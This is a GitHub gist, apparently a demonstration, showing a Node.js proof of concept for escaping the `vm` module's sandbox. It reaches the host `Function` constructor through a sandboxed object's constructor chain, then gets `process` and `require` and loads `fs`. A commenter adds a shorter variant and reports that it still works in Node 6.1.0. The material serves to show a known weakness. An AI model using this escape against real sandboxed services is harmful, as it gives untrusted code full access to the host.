Skip to content

Instantly share code, notes, and snippets.

@domenic domenic/escape-vm.js
Created Aug 17, 2015

Embed
What would you like to do?
Escaping the vm sandbox
"use strict";
const vm = require("vm");
const sandbox = { anObject: {} };
const whatIsThis = vm.runInNewContext(`
const ForeignObject = anObject.constructor;
const ForeignFunction = ForeignObject.constructor;
const process = ForeignFunction("return process")();
const require = process.mainModule.require;
require("fs");
`, sandbox);
@NiXXeD

This comment has been minimized.

Copy link

commented May 13, 2016

Technically you can also just do:
const ForeignFunction = this.constructor.constructor;
since the context object itself is created in the context you want. You don't even need a foreign object.

Also, this still appears to be an issue in Node 6.1.0. Just tested this for a silly Hubot script we have.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.